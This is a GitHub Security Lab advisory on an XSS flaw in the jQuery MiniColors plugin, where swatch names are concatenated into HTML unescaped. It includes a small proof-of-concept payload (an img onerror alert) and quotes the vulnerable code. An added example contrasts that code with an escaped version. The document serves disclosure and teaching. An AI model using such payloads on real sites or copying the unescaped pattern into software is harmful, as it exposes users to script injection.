Coordinated Disclosure Timeline
- 2021-11-24: Maintainer contacted
- 2021-11-24: Maintainer fixed the issue
Summary
jQuery MiniColors Plugin is prone to XSS when handling untrusted color names.
Product
jQuery MiniColors Plugin
Tested Version
Details
Issue 1: XSS while handling color names (GHSL-2021-1045)
An attacker who is able to influence the name of a color can supply arbitrary HTML or JavaScript code that will be rendered in the context of a user, potentially leading to XSS.
Proof of concept snippet:
var settings = {
  swatches: [
    { name: '"> <img src="foobar" onerror="alert(2)" /> <', color: "black" }
  ]
};
$('input.minicolors').minicolors(settings);
Vulnerable code: jquery.minicolors.js
$('<li class="minicolors-swatch minicolors-sprite"><span class="minicolors-swatch-color" title="' + name + '"></span></li>')
  .appendTo(swatches)
  .data('swatch-color', swatchString)
  .find('.minicolors-swatch-color')
  .css({
    backgroundColor: ((swatchString !== 'transparent') ? rgb2hex(swatch) : 'transparent'),
    opacity: String(swatch.a)
  });
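The concatenation pattern above next to an escaped variant, as an added example that is not code from jquery-minicolors or from this advisory. The function names are hypothetical, the tag scanner exists only to show which elements the resulting markup opens, and the sample name is the one from the proof of concept; it runs in Node without a DOM.

```javascript
// Added example, not jquery-minicolors code; all function names are hypothetical.
const SWATCH_PREFIX =
  '<li class="minicolors-swatch minicolors-sprite">' +
  '<span class="minicolors-swatch-color" title="';
const SWATCH_SUFFIX = '"></span></li>';

// Mirrors the vulnerable pattern: the name is concatenated into markup as-is.
function buildSwatchUnsafe(name) {
  return SWATCH_PREFIX + name + SWATCH_SUFFIX;
}

// Escape the characters that are significant inside a quoted attribute value.
function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function buildSwatchSafe(name) {
  return SWATCH_PREFIX + escapeAttr(name) + SWATCH_SUFFIX;
}

// Minimal scanner: lists start tags, treating quoted attribute values as opaque.
function openedTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<' || !/[a-zA-Z]/.test(html[i + 1] || '')) { i++; continue; }
    let j = i + 1;
    while (j < html.length && /[a-zA-Z0-9]/.test(html[j])) j++;
    tags.push(html.slice(i + 1, j).toLowerCase());
    let quote = null;
    for (; j < html.length; j++) {
      const ch = html[j];
      if (quote) { if (ch === quote) quote = null; }
      else if (ch === '"' || ch === "'") quote = ch;
      else if (ch === '>') break;
    }
    i = j + 1;
  }
  return tags;
}

// Elements other than the <li>/<span> pair the swatch template is meant to create.
function unexpectedTags(html) {
  return openedTags(html).filter((t) => t !== 'li' && t !== 'span');
}

// Constructed sample: the swatch name from the proof of concept above.
const pocName = '"> <img src="foobar" onerror="alert(2)" /> <';
console.log(unexpectedTags(buildSwatchUnsafe(pocName)), unexpectedTags(buildSwatchSafe(pocName)));
```

In jQuery code the same result is reached without manual escaping by creating the element first and setting the value with `.attr('title', name)`, which never passes the name through the HTML parser.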
Impact
This issue may lead to XSS.
CVE
- CVE-2021-32850
Resources
- https://github.com/claviska/jquery-minicolors/commit/ef134824a7f4110ada53ea6c173111a4fa2f48f3
Credit
This issue was discovered by GitHub team member @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2021-1045 in any communication regarding this issue.